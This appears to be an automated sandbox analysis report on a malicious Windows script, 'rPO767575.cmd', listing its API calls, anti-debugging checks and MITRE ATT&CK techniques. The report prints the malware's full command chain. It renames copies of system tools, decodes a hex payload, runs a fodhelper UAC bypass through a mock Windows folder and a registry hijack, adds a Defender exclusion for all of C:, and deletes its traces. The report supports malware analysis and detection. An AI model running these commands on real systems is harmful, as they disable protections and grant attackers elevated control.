        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,38_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,38_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,38_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,38_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF60801511C
        Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
        Source: Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000075E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPay%SystemRoot%\system32\mswsock.dll)
        Source: C:\Users\Public\Libraries\Ping_c.pif | API call chain: ExitProcess graph end node
        Source: C:\Users\Public\xkn.exe | Process information queried: ProcessInformation

        Anti Debugging

        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: 31_2_0295D5D0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,31_2_0295D5D0
        Source: C:\Users\Public\Libraries\Ping_c.pif | Process queried: DebugPort
        Source: C:\Users\Public\Libraries\Ping_c.pif | Process queried: DebugFlags
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F263FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF744F263FC
        Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF73A39A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,19_2_00007FF73A39A29C
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,31_2_02957CA8
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: 31_2_029873AD mov eax, dword ptr fs:[00000030h] 31_2_029873AD
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F14D5C InitializeCriticalSection,SetConsoleCtrlHandler,_get_osfhandle,GetConsoleMode,_get_osfhandle,GetConsoleMode,GetCommandLineW,GetCommandLineW,GetWindowsDirectoryW,GetConsoleOutputCP,GetCPInfo,GetProcessHeap,HeapAlloc,GetConsoleTitleW,GetStdHandle,GetConsoleScreenBufferInfo,GlobalFree,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,free,4_2_00007FF744F14D5C
        Source: C:\Users\Public\xkn.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F193B0 SetUnhandledExceptionFilter,4_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF744F193B0 SetUnhandledExceptionFilter,5_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF744F193B0 SetUnhandledExceptionFilter,8_2_00007FF744F193B0
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608064E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF608064E18
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF6080653E0 SetUnhandledExceptionFilter,9_2_00007FF6080653E0
        Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF73A39ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF73A39ED50
        Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF73A39F050 SetUnhandledExceptionFilter,19_2_00007FF73A39F050
        Source: C:\Windows \System32\per.exe | Code function: 22_2_00007FF739D289F0 SetUnhandledExceptionFilter,22_2_00007FF739D289F0
        Source: C:\Windows \System32\per.exe | Code function: 22_2_00007FF739D28CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF739D28CCC
        Source: C:\Users\Public\alpha.exe | Code function: 35_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exe | Code function: 35_2_00007FF744F193B0 SetUnhandledExceptionFilter,35_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exe | Code function: 38_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exe | Code function: 38_2_00007FF744F193B0 SetUnhandledExceptionFilter,38_2_00007FF744F193B0
        Source: C:\Users\Public\xkn.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
        Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608017024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,9_2_00007FF608017024
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\Ping_c.pif C:\Users\Public\Libraries\Ping_c.pif
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608004AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF608004AF4
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608004E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF608004E88
        Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF744F06EE4
        Source: C:\Users\Public\kn.exe | Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,9_2_00007FF608063800
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,31_2_0295D754
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,31_2_02945A78
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: GetLocaleInfoA,31_2_0294A788
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: GetLocaleInfoA,31_2_0294A73C
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,31_2_029644DE
        Source: C:\Users\Public\Libraries\Ping_c.pif | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,31_2_02945B84
        Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,35_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,35_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,35_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,38_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,38_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,38_2_00007FF744F06EE4
        Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\Public\xkn.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F28654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF744F28654
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FB8944 GetComputerNameExW,GetLastError,#357,GetUserNameExW,GetLastError,#357,#357,#357,#357,#357,#357,9_2_00007FF607FB8944
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F0586C GetVersion,4_2_00007FF744F0586C
        Source: C:\Users\Public\xkn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F7227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,9_2_00007FF607F7227C
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F8E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,9_2_00007FF607F8E568
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F754A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,9_2_00007FF607F754A0
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F95648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,9_2_00007FF607F95648
        MITRE ATT&CK Matrix (cell counts precede the technique name; techniques without a count were not observed)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 311 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
        Credentials | Domains | Default Accounts | 11 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 2 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Process Injection | 1 Install Root Certificate | LSA Secrets | 38 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 251 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 1 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | 41 Virtualization/Sandbox Evasion | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 331 Masquerading | Network Sniffing | 1 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 2 Valid Accounts | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
        Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 41 Virtualization/Sandbox Evasion | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
        Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 21 Access Token Manipulation | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
        Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 11 Process Injection | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
        Behavior Graph ID: 1515085; Sample: rPO767575.cmd; Start date: 21/09/2024; Architecture: WINDOWS; Score: 100

        • Start (rPO767575.cmd)
          Network: onedrive.live.com; dual-spov-0006.spov-msedge.net; 4 other IPs or domains
          Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
